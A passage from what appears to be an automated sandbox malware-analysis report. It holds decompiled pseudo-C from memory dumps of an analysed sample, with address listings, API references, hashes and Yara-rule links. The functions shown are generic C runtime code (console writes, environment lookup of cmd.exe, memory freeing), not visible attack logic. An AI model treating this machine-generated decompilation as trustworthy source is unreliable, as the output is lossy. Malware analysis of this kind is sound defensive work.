								_t117 = _t117 + 0x10;
								_t78 = _t69;
								_t70 = E00AF69E3();
								if(_t78 == 0xffffffff) {
									if( *_t70 == 2 ||  *((intOrPtr*)(E00AF69E3())) == 0xd) {
										 *((intOrPtr*)(E00AF69E3())) = _t99;
										goto L27;
									} else {
										_t106 = _t106 | 0xffffffff;
									}
								} else {
									 *_t70 = _t99;
									_t106 = _t78;
								}
							}
						} else {
							if(_v32 != _t106) {
								_t73 = E00AFF377(_t78, _t106, _v32, _t106);
								asm("sbb esi, esi");
								_t106 =  ~_t73 + 1;
							}
						}
						L00AF4D62(_v32);
						return L00AD1DCD(_v12 ^ _t111);
					} else {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00AF68E9();
						asm("int3");
						_push(_t111);
						return E00AFF44F(__ebx, 0,  *_v116,  *_v112);
					}
				}
			}






































                                                  0x00ae368a
                                                  0x00ae368a
                                                  0x00ae3692
                                                  0x00ae3699
                                                  0x00ae369c
                                                  0x00ae369d
                                                  0x00ae369e
                                                  0x00ae369f
                                                  0x00ae36a5
                                                  0x00ae36ae
                                                  0x00ae36b1
                                                  0x00ae36b6
                                                  0x00ae36bb
                                                  0x00ae36c8
                                                  0x00ae36e7
                                                  0x00ae36ea
                                                  0x00ae36ed
                                                  0x00ae36f4
                                                  0x00ae36f7
                                                  0x00ae36fc
                                                  0x00ae374a
                                                  0x00ae374a
                                                  0x00ae3756
                                                  0x00ae3761
                                                  0x00ae36fe
                                                  0x00ae3703
                                                  0x00ae3705
                                                  0x00ae370a
                                                  0x00ae370b
                                                  0x00ae3710
                                                  0x00ae3715
                                                  0x00ae371a
                                                  0x00ae371d
                                                  0x00ae371f
                                                  0x00ae3727
                                                  0x00ae3732
                                                  0x00ae3748
                                                  0x00000000
                                                  0x00ae373e
                                                  0x00ae373e
                                                  0x00ae373e
                                                  0x00ae3729
                                                  0x00ae3729
                                                  0x00ae372b
                                                  0x00ae372b
                                                  0x00ae3727
                                                  0x00ae36ca
                                                  0x00ae36cd
                                                  0x00ae36d7
                                                  0x00ae36e1
                                                  0x00ae36e4
                                                  0x00ae36e4
                                                  0x00ae36cd
                                                  0x00ae3766
                                                  0x00ae377e
                                                  0x00ae377f
                                                  0x00ae377f
                                                  0x00ae3780
                                                  0x00ae3781
                                                  0x00ae3782
                                                  0x00ae3783
                                                  0x00ae3784
                                                  0x00ae3789
                                                  0x00ae378c
                                                  0x00ae378d
                                                  0x00ae3792
                                                  0x00ae3799
                                                  0x00ae379c
                                                  0x00ae379d
                                                  0x00ae379e
                                                  0x00ae379f
                                                  0x00ae37a5
                                                  0x00ae37ae
                                                  0x00ae37b1
                                                  0x00ae37b6
                                                  0x00ae37bb
                                                  0x00ae37c8
                                                  0x00ae37e7
                                                  0x00ae37ea
                                                  0x00ae37ed
                                                  0x00ae37f4
                                                  0x00ae37f7
                                                  0x00ae37fc
                                                  0x00ae384a
                                                  0x00ae384a
                                                  0x00ae3856
                                                  0x00ae3861
                                                  0x00ae37fe
                                                  0x00ae3803
                                                  0x00ae3805
                                                  0x00ae380a
                                                  0x00ae380b
                                                  0x00ae3810
                                                  0x00ae3815
                                                  0x00ae381a
                                                  0x00ae381d
                                                  0x00ae381f
                                                  0x00ae3827
                                                  0x00ae3832
                                                  0x00ae3848
                                                  0x00000000
                                                  0x00ae383e
                                                  0x00ae383e
                                                  0x00ae383e
                                                  0x00ae3829
                                                  0x00ae3829
                                                  0x00ae382b
                                                  0x00ae382b
                                                  0x00ae3827
                                                  0x00ae37ca
                                                  0x00ae37cd
                                                  0x00ae37d7
                                                  0x00ae37e1
                                                  0x00ae37e4
                                                  0x00ae37e4
                                                  0x00ae37cd
                                                  0x00ae3866
                                                  0x00ae387e
                                                  0x00ae387f
                                                  0x00ae387f
                                                  0x00ae3880
                                                  0x00ae3881
                                                  0x00ae3882
                                                  0x00ae3883
                                                  0x00ae3884
                                                  0x00ae3889
                                                  0x00ae388c
                                                  0x00ae38a1
                                                  0x00ae38a1
                                                  0x00ae37bb

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: COMSPEC$COMSPEC$cmd.exe$cmd.exe
                                                  • API String ID: 269201875-1422091540
                                                  • Opcode ID: e019e88f8e65786c43b5dec3febe7fa933df5aed4592fd4aa121304db8f1f39e
                                                  • Instruction ID: 4564f1d776a46b0d06529a3ce702f3999d0a59b1100e768ca0b6d6496293ea89
                                                  • Opcode Fuzzy Hash: e019e88f8e65786c43b5dec3febe7fa933df5aed4592fd4aa121304db8f1f39e
                                                  • Instruction Fuzzy Hash: 4351BCB2D00119AF8F21AFEACD464BFBBB8DF55720B11016AF905A7261DA719F01C7E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B04331, Relevance: 10.7, APIs: 7, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E00B04331(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				signed int _t76;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				char _t92;
				char _t99;
				void* _t100;
				signed int _t103;
				void* _t106;
				char _t118;
				intOrPtr* _t119;
				void* _t122;
				char* _t124;
				signed int _t128;
				intOrPtr* _t133;
				void* _t134;
				intOrPtr* _t135;
				char* _t140;

				_t122 = __edx;
				_t99 = _a4;
				_v28 = _t99;
				_v24 = 0;
				if( *((intOrPtr*)(_t99 + 0xb0)) != 0 ||  *((intOrPtr*)(_t99 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E00AF4F03(_t100, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t103 = 0x14;
						memcpy(_t53,  *(_t99 + 0x88), _t103 << 2);
						_t133 = L00AF4D9C(0, 4);
						_t128 = 0;
						_v12 = _t133;
						L00AF4D62(0);
						_pop(_t106);
						if(_t133 != 0) {
							 *_t133 = 0;
							if( *((intOrPtr*)(_t99 + 0xb0)) == 0) {
								_t134 = _v8;
								_t57 =  *0xb26830; // 0xb26828
								 *_t134 = _t57;
								_t58 =  *0xb26834; // 0xb27d6c
								 *((intOrPtr*)(_t134 + 4)) = _t58;
								_t59 =  *0xb26838; // 0xb27d6c
								 *((intOrPtr*)(_t134 + 8)) = _t59;
								_t60 =  *0xb26860; // 0xb2682c
								 *((intOrPtr*)(_t134 + 0x30)) = _t60;
								_t61 =  *0xb26864; // 0xb27d70
								 *((intOrPtr*)(_t134 + 0x34)) = _t61;
								L18:
								 *_v12 = 1;
								if(_t128 != 0) {
									 *_t128 = 1;
								}
								goto L20;
							}
							_t135 = L00AF4D9C(_t106, 4);
							_v20 = _t135;
							L00AF4D62(0);
							if(_t135 == 0) {
								L11:
								L00AF4D62(_v8);
								L00AF4D62(_v12);
								return _v16;
							}
							 *_t135 = 0;
							_t129 =  *((intOrPtr*)(_t99 + 0xb0));
							_t76 = E00B0F5EC(_t122,  &_v28, 1,  *((intOrPtr*)(_t99 + 0xb0)), 0xe, _v8);
							_t78 = E00B0F5EC(_t122,  &_v28, 1,  *((intOrPtr*)(_t99 + 0xb0)), 0xf, _v8 + 4);
							_v16 = _v8 + 8;
							_t82 = E00B0F5EC(_t122,  &_v28, 1,  *((intOrPtr*)(_t99 + 0xb0)), 0x10, _v8 + 8);
							_t86 = E00B0F5EC(_t122,  &_v28, 2, _t129, 0xe, _v8 + 0x30);
							if((E00B0F5EC(_t122,  &_v28, 2, _t129, 0xf, _v8 + 0x34) | _t76 | _t78 | _t82 | _t86) == 0) {
								_t124 =  *_v16;
								while( *_t124 != 0) {
									_t118 =  *_t124;
									_t92 = _t118 - 0x30;
									if(_t92 > 9) {
										if(_t118 != 0x3b) {
											L15:
											_t124 = _t124 + 1;
											continue;
										}
										_t140 = _t124;
										do {
											_t119 = _t140 + 1;
											 *_t140 =  *_t119;
											_t140 = _t119;
										} while ( *_t140 != 0);
										continue;
									}
									 *_t124 = _t92;
									goto L15;
								}
								_t128 = _v20;
								_t134 = _v8;
								goto L18;
							}
							E00B042C8(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						L00AF4D62(_v8);
						return 1;
					}
					return 1;
				} else {
					_t128 = 0;
					_v12 = 0;
					_t134 = 0xb26830;
					L20:
					_t64 =  *(_t99 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t99 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							L00AF4D62( *((intOrPtr*)(_t99 + 0x7c)));
							L00AF4D62( *(_t99 + 0x88));
						}
					}
					 *((intOrPtr*)(_t99 + 0x7c)) = _v12;
					 *(_t99 + 0x80) = _t128;
					 *(_t99 + 0x88) = _t134;
					return 0;
				}
			}


































                                                  0x00b04331
                                                  0x00b0433a
                                                  0x00b04341
                                                  0x00b04344
                                                  0x00b0434d
                                                  0x00b0436c
                                                  0x00b0436f
                                                  0x00b04374
                                                  0x00b0437b
                                                  0x00b0438e
                                                  0x00b0438f
                                                  0x00b04398
                                                  0x00b0439a
                                                  0x00b0439d
                                                  0x00b043a0
                                                  0x00b043a6
                                                  0x00b043a9
                                                  0x00b043bc
                                                  0x00b043c4
                                                  0x00b0451d
                                                  0x00b04520
                                                  0x00b04525
                                                  0x00b04527
                                                  0x00b0452c
                                                  0x00b0452f
                                                  0x00b04534
                                                  0x00b04537
                                                  0x00b0453c
                                                  0x00b0453f
                                                  0x00b04544
                                                  0x00b044ab
                                                  0x00b044b1
                                                  0x00b044b5
                                                  0x00b044b7
                                                  0x00b044b7
                                                  0x00000000
                                                  0x00b044b5
                                                  0x00b043d1
                                                  0x00b043d4
                                                  0x00b043d7
                                                  0x00b043e0
                                                  0x00b04475
                                                  0x00b04478
                                                  0x00b04481
                                                  0x00000000
                                                  0x00b0448a
                                                  0x00b043e9
                                                  0x00b043ee
                                                  0x00b043fa
                                                  0x00b04411
                                                  0x00b04422
                                                  0x00b0442b
                                                  0x00b04442
                                                  0x00b04466
                                                  0x00b04490
                                                  0x00b044a0
                                                  0x00b04494
                                                  0x00b04496
                                                  0x00b0449b
                                                  0x00b04509
                                                  0x00b0449f
                                                  0x00b0449f
                                                  0x00000000
                                                  0x00b0449f
                                                  0x00b0450b
                                                  0x00b0450d
                                                  0x00b0450d
                                                  0x00b04512
                                                  0x00b04514
                                                  0x00b04516
                                                  0x00000000
                                                  0x00b0451b
                                                  0x00b0449d
                                                  0x00000000
                                                  0x00b0449d
                                                  0x00b044a5
                                                  0x00b044a8
                                                  0x00000000
                                                  0x00b044a8
                                                  0x00b0446b
                                                  0x00b04470
                                                  0x00000000
                                                  0x00b04474
                                                  0x00b043ae
                                                  0x00000000
                                                  0x00b043b6
                                                  0x00000000
                                                  0x00b04357
                                                  0x00b04357
                                                  0x00b04359
                                                  0x00b0435c
                                                  0x00b044b9
                                                  0x00b044b9
                                                  0x00b044c1
                                                  0x00b044c3
                                                  0x00b044c3
                                                  0x00b044cb
                                                  0x00b044d0
                                                  0x00b044d4
                                                  0x00b044d9
                                                  0x00b044e4
                                                  0x00b044ea
                                                  0x00b044d4
                                                  0x00b044ee
                                                  0x00b044f3
                                                  0x00b044f9
                                                  0x00000000
                                                  0x00b044f9

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 22bd4376cfdbdde1de92a95c6721b4043566e78a333bcffdc260f607892eccf6
                                                  • Instruction ID: 8a795263933c9b7142411508349903e18cd967f727ed15a2cf72daf2040e4e89
                                                  • Opcode Fuzzy Hash: 22bd4376cfdbdde1de92a95c6721b4043566e78a333bcffdc260f607892eccf6
                                                  • Instruction Fuzzy Hash: 3B6174B1900215AFDB20DFA9C841BAEBBF5FF58710F1441AAEA45EB381EB709D41CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF99A8, Relevance: 10.7, APIs: 7, Instructions: 162fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E00AF99A8(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				signed char* _v36;
				long _v40;
				intOrPtr _v44;
				signed char* _v48;
				void* _v52;
				signed int _v56;
				int _v60;
				long _v64;
				signed int _t81;
				signed int _t83;
				int _t89;
				signed char* _t91;
				void* _t99;
				signed char* _t100;
				long _t104;
				void _t112;
				void* _t121;
				signed int _t126;
				signed int _t128;
				signed char _t132;
				signed char _t138;
				intOrPtr _t139;
				signed int _t141;
				signed char* _t143;
				intOrPtr* _t145;
				signed int _t146;
				void* _t147;

				_t81 =  *0xb26018; // 0xb47fd95f
				_v8 = _t81 ^ _t146;
				_t83 = _a8;
				_t128 = _t83 >> 6;
				_t126 = (_t83 & 0x0000003f) * 0x30;
				_t143 = _a12;
				_v48 = _t143;
				_v56 = _t128;
				_v52 =  *((intOrPtr*)( *((intOrPtr*)(0xb279f0 + _t128 * 4)) + _t126 + 0x18));
				_v44 = _a16 + _t143;
				_t89 = GetConsoleCP();
				_t145 = _a4;
				_v60 = _t89;
				 *_t145 = 0;
				 *((intOrPtr*)(_t145 + 4)) = 0;
				 *((intOrPtr*)(_t145 + 8)) = 0;
				_t91 = _t143;
				if(_t91 < _v44) {
					_v36 =  &(_t91[1]);
					do {
						_v28 = 0;
						_v31 =  *_t143;
						_t139 =  *((intOrPtr*)(0xb279f0 + _v56 * 4));
						_t132 =  *(_t139 + _t126 + 0x2d);
						if((_t132 & 0x00000004) == 0) {
							if( *((intOrPtr*)(E00AFF8A5(_t126, _t139) + ( *_t143 & 0x000000ff) * 2)) >= 0) {
								_push(1);
								_push(_t143);
								goto L9;
							} else {
								if(_v36 >= _v44) {
									_t141 = _v56;
									 *((char*)( *((intOrPtr*)(0xb279f0 + _t141 * 4)) + _t126 + 0x2e)) =  *_t143;
									 *( *((intOrPtr*)(0xb279f0 + _t141 * 4)) + _t126 + 0x2d) =  *( *((intOrPtr*)(0xb279f0 + _t141 * 4)) + _t126 + 0x2d) | 0x00000004;
									 *((intOrPtr*)(_t145 + 4)) =  *((intOrPtr*)(_t145 + 4)) + 1;
								} else {
									_t121 = E00AFB377( &_v28, _t143, 2);
									_t147 = _t147 + 0xc;
									if(_t121 != 0xffffffff) {
										_t143 =  &(_t143[1]);
										_t100 =  &(_v36[1]);
										goto L11;
									}
								}
							}
						} else {
							_t138 = _t132 & 0x000000fb;
							_v16 =  *((intOrPtr*)(_t139 + _t126 + 0x2e));
							_push(2);
							_v15 = _t138;
							 *(_t139 + _t126 + 0x2d) = _t138;
							_push( &_v16);
							L9:
							_push( &_v28);
							_t99 = E00AFB377();
							_t147 = _t147 + 0xc;
							if(_t99 != 0xffffffff) {
								_t100 = _v36;
								L11:
								_t143 =  &(_t143[1]);
								_v36 =  &(_t100[1]);
								_t104 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
								_v64 = _t104;
								if(_t104 != 0) {
									if(WriteFile(_v52,  &_v24, _t104,  &_v40, 0) == 0) {
										L21:
										 *_t145 = GetLastError();
									} else {
										 *((intOrPtr*)(_t145 + 4)) = _t143 - _v48 +  *((intOrPtr*)(_t145 + 8));
										if(_v40 >= _v64) {
											if(_v31 != 0xa) {
												goto L18;
											} else {
												_t112 = 0xd;
												_v32 = _t112;
												if(WriteFile(_v52,  &_v32, 1,  &_v40, 0) == 0) {
													goto L21;
												} else {
													if(_v40 >= 1) {
														 *((intOrPtr*)(_t145 + 8)) =  *((intOrPtr*)(_t145 + 8)) + 1;
														 *((intOrPtr*)(_t145 + 4)) =  *((intOrPtr*)(_t145 + 4)) + 1;
														goto L18;
													}
												}
											}
										}
									}
								}
							}
						}
						goto L22;
						L18:
					} while (_t143 < _v44);
				}
				L22:
				return L00AD1DCD(_v8 ^ _t146);
			}





































                                                  0x00af99b0
                                                  0x00af99b7
                                                  0x00af99ba
                                                  0x00af99c2
                                                  0x00af99c6
                                                  0x00af99d2
                                                  0x00af99d5
                                                  0x00af99d8
                                                  0x00af99df
                                                  0x00af99e7
                                                  0x00af99ea
                                                  0x00af99f0
                                                  0x00af99f3
                                                  0x00af99f8
                                                  0x00af99fa
                                                  0x00af99fd
                                                  0x00af9a00
                                                  0x00af9a05
                                                  0x00af9a0c
                                                  0x00af9a0f
                                                  0x00af9a13
                                                  0x00af9a1a
                                                  0x00af9a1d
                                                  0x00af9a24
                                                  0x00af9a2b
                                                  0x00af9a54
                                                  0x00af9a81
                                                  0x00af9a83
                                                  0x00000000
                                                  0x00af9a56
                                                  0x00af9a5c
                                                  0x00af9b30
                                                  0x00af9b3c
                                                  0x00af9b47
                                                  0x00af9b4c
                                                  0x00af9a62
                                                  0x00af9a69
                                                  0x00af9a6e
                                                  0x00af9a74
                                                  0x00af9a7d
                                                  0x00af9a7e
                                                  0x00000000
                                                  0x00af9a7e
                                                  0x00af9a74
                                                  0x00af9a5c
                                                  0x00af9a2d
                                                  0x00af9a31
                                                  0x00af9a34
                                                  0x00af9a3a
                                                  0x00af9a3c
                                                  0x00af9a3f
                                                  0x00af9a43
                                                  0x00af9a84
                                                  0x00af9a87
                                                  0x00af9a88
                                                  0x00af9a8d
                                                  0x00af9a93
                                                  0x00af9a99
                                                  0x00af9a9c
                                                  0x00af9a9e
                                                  0x00af9aa4
                                                  0x00af9ab5
                                                  0x00af9abb
                                                  0x00af9ac0
                                                  0x00af9add
                                                  0x00af9b51
                                                  0x00af9b57
                                                  0x00af9adf
                                                  0x00af9ae7
                                                  0x00af9af0
                                                  0x00af9af6
                                                  0x00000000
                                                  0x00af9af8
                                                  0x00af9afa
                                                  0x00af9afb
                                                  0x00af9b17
                                                  0x00000000
                                                  0x00af9b19
                                                  0x00af9b1d
                                                  0x00af9b1f
                                                  0x00af9b22
                                                  0x00000000
                                                  0x00af9b22
                                                  0x00af9b1d
                                                  0x00af9b17
                                                  0x00af9af6
                                                  0x00af9af0
                                                  0x00af9add
                                                  0x00af9ac0
                                                  0x00af9a93
                                                  0x00000000
                                                  0x00af9b25
                                                  0x00af9b25
                                                  0x00af9b2e
                                                  0x00af9b59
                                                  0x00af9b6b

                                                  APIs
                                                  • GetConsoleCP.KERNEL32(00441F0F,00000000,00000000,?,?,?,?,?,?,?,00AFA134,?,00000000,00000000,?,D77501FB), ref: 00AF99EA
                                                  • __fassign.LIBCMT ref: 00AF9A69
                                                  • __fassign.LIBCMT ref: 00AF9A88
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00AF9AB5
                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00AFA134), ref: 00AF9AD5
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00AFA134), ref: 00AF9B0F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 0dbfe4d1c04eda41686430d379c2729b5f37680586a91f4603e466412c324c47
                                                  • Instruction ID: 355f5f921e68cd7451e1990efff7a2886bc2ab54909ee84f8727cf5442c6f0a3
                                                  • Opcode Fuzzy Hash: 0dbfe4d1c04eda41686430d379c2729b5f37680586a91f4603e466412c324c47
                                                  • Instruction Fuzzy Hash: 09516DB1A10249AFDB10CFE8EC85AEEBBF9EF09310F14416AF655E7251D730A941CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408226, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E00408226(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x9e6834eb
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                                                  0x0040822e
                                                  0x00408235
                                                  0x00408238
                                                  0x00408240
                                                  0x00408244
                                                  0x00408250
                                                  0x00408253
                                                  0x00408256
                                                  0x0040825d
                                                  0x00408265
                                                  0x00408268
                                                  0x0040826e
                                                  0x00408274
                                                  0x00408279
                                                  0x0040827b
                                                  0x0040827e
                                                  0x00408283
                                                  0x0040828d
                                                  0x00408294
                                                  0x00408297
                                                  0x0040829e
                                                  0x004082a5
                                                  0x004082d1
                                                  0x004082f7
                                                  0x004082f9
                                                  0x00000000
                                                  0x004082d3
                                                  0x004082d6
                                                  0x0040839d
                                                  0x004083a9
                                                  0x004083b4
                                                  0x004083b9
                                                  0x004082dc
                                                  0x004082e3
                                                  0x004082e8
                                                  0x004082ee
                                                  0x004082f4
                                                  0x00000000
                                                  0x004082f4
                                                  0x004082ee
                                                  0x004082d6
                                                  0x004082a7
                                                  0x004082ab
                                                  0x004082ae
                                                  0x004082b4
                                                  0x004082b6
                                                  0x004082b9
                                                  0x004082bd
                                                  0x004082fa
                                                  0x004082fd
                                                  0x004082fe
                                                  0x00408303
                                                  0x00408309
                                                  0x0040830f
                                                  0x0040831e
                                                  0x00408324
                                                  0x0040832a
                                                  0x0040832f
                                                  0x0040834b
                                                  0x004083be
                                                  0x004083c4
                                                  0x0040834d
                                                  0x00408355
                                                  0x0040835e
                                                  0x00408364
                                                  0x00000000
                                                  0x00408366
                                                  0x00408368
                                                  0x0040836b
                                                  0x00408384
                                                  0x00000000
                                                  0x00408386
                                                  0x0040838a
                                                  0x0040838c
                                                  0x0040838f
                                                  0x00000000
                                                  0x0040838f
                                                  0x0040838a
                                                  0x00408384
                                                  0x00408364
                                                  0x0040835e
                                                  0x0040834b
                                                  0x0040832f
                                                  0x00408309
                                                  0x00000000
                                                  0x00408392
                                                  0x00408392
                                                  0x004083c6
                                                  0x004083d0
                                                  0x004083d8

                                                  APIs
                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0040899B,?,00000000,?,00000000,00000000), ref: 00408268
                                                  • __fassign.LIBCMT ref: 004082E3
                                                  • __fassign.LIBCMT ref: 004082FE
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408324
                                                  • WriteFile.KERNEL32(?,?,00000000,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 00408343
                                                  • WriteFile.KERNEL32(?,?,00000001,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 0040837C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                                                  • Instruction ID: fe7485239ce71f502252f8dacad0a730230a626615d7e560becd3163b8212ce1
                                                  • Opcode Fuzzy Hash: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                                                  • Instruction Fuzzy Hash: B551C070900209EFCB10CFA8D985AEEBBF4EF59300F14416EE995F3291EB359951CB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFC713, Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E00AFC713(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				long _t12;
				void* _t38;
				void* _t41;
				void* _t43;
				void* _t47;
				long _t48;
				long _t49;
				long _t53;
				long _t54;
				void* _t58;

				_t47 = __edx;
				_t41 = __ecx;
				_t38 = __ebx;
				_push(_t48);
				_t53 = GetLastError();
				_t2 =  *0xb26230; // 0x6
				_t60 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L5:
					_t3 = L00AF8E21(_t41, _t53, __eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L14;
					} else {
						_t48 = E00AF4F03(_t41, 1, 0x364);
						_pop(_t41);
						__eflags = _t48;
						if(__eflags != 0) {
							__eflags = L00AF8E21(_t41, _t53, __eflags,  *0xb26230, _t48);
							if(__eflags != 0) {
								E00AFC3B1(_t53, _t48, 0xb27ce0);
